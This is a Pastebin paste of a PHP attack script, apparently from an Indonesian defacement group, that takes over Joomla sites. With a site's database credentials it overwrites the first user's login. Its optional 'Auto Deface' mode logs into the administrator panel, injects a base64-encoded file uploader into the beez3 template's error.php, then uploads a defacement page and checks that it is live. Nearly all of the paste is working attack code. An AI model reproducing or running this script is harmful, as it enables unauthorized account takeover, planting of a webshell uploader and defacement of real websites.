Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- //Tu5b0l3d
- //thx to: IndoXploit, Hacker-Newbie.org
- if($_POST['submitt']){
- $host = $_POST['host'];
- $username = $_POST['username'];
- $password = $_POST['password'];
- $db = $_POST['db'];
- $dbprefix = $_POST['dbprefix'];
- $user_baru = $_POST['user_baru'];
- $password_baru = $_POST['password_baru'];
- $tanya = $_POST['tanya'];
- $prefix = $dbprefix."users";
- $pass = md5("$password_baru");
- $upda = $db.".".$dbprefix;
- $target = $_POST['target'];
- mysql_connect($host,$username,$password) or die("Koneksi gagal.. isi data yg bener");
- mysql_select_db($db) or die("Database tidak bisa dibuka.. Isi data yg bener");
- $tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $r=mysql_fetch_array($tampil);
- $id = $r[id];
- mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
- function token($target){
- $ch2 = curl_init ("$target");
- curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch2, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
- $data = curl_exec ($ch2);
- preg_match('/<input type="hidden" name="(.*?)" value="1"/', $data, $token);
- $token = $token[1];
- return $token;
- }
- if ($tanya == "y"){
- $path = "/administrator/index.php?option=com_templates&task=source.edit&id=NTAzOmVycm9yLnBocA%3D%3D";
- $site = $target.$path;
- $token1 = token($site);
- $post = array(
- "username" => "$user_baru",
- "passwd" => "$password_baru",
- "lang" => "en-GB",
- "option" => "com_login",
- "task" => "login",
- "return" => "aW5kZXgucGhwP29wdGlvbj1jb21fdGVtcGxhdGVzJnRhc2s9c291cmNlLmVkaXQmaWQ9TlRBek9tVnljbTl5TG5Cb2NBJTNEJTNE",
- "$token1" => "1",
- );
- $ch = curl_init ("$site");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $masuk = curl_exec ($ch);
- $token2 = token($site);
- $upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
- $post2 = array(
- "jform[source]" => "$upload",
- "task" => "source.save",
- "$token2" => "1",
- "jform[extension_id]"=> "503",
- "jform[filename]" => "error.php",
- );
- $ch3 = curl_init ("$site");
- curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch3, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch3, CURLOPT_POST, 1);
- curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
- curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
- $masuk2 = curl_exec ($ch3);
- if(preg_match("#successfully#is", $masuk2)){
- echo "uploader udh ketanem...<br>";
- echo "lanjut mepes...<br>";
- $file_pepes = "hacked.php";
- $ch4 =curl_init("$target/templates/beez3/error.php");
- curl_setopt($ch4, CURLOPT_POST, true);
- curl_setopt($ch4, CURLOPT_POSTFIELDS,
- array('file'=>"@$file_pepes"));
- curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
- $postResult = curl_exec($ch4);
- curl_close($ch4);
- $ch5 = "$target/k.php";
- $file2 = @file_get_contents($ch5);
- if(preg_match('#hacked#i', $file2)){
- echo "<font color='green'>berhasil mepes...</font><br>";
- echo "$target/k.php<br>";
- }
- else{
- echo "<font color='red'>gagal mepes...</font><br>";
- echo "coba aja manual: <br>";
- echo "$target/administrator<br>";
- echo "username: $user_baru<br>";
- echo "password: $password_baru<br>";
- }
- }
- else{
- echo "failed<br>";
- echo "data udh bener. beda template mungkin :(<br>";
- echo "coba aja manual: <br>";
- echo "$target/administrator<br>";
- echo "username: $user_baru<br>";
- echo "password: $password_baru<br>";
- }
- }
- elseif($tanya == "n"){
- echo "Sukses<br>";
- echo "username: $user_baru<br>";
- echo "password: $password_baru<br>";
- }
- }
- else{
- echo '<html>
- <head>
- <title>Edit user in joomla v.2</title>
- </head>
- <body>
- <center>
- <center
- <h2>Edit user in joomla v.2</h2>
- <table>
- <tr><td><form method="post" action="?action"></td></tr>
- <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
- <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
- <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
- <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
- <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
- <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
- <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
- <tr><td></td></tr>
- <tr><td></td></tr>
- <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
- <tr><td><input type="text" name="target" placeholder="www.IndoXploit.org"></td></tr>
- <tr><td><input type="submit" value="Submit" name="submitt"></td></tr>
- </table>
- *nb: kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
- </center>
- </body>';
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement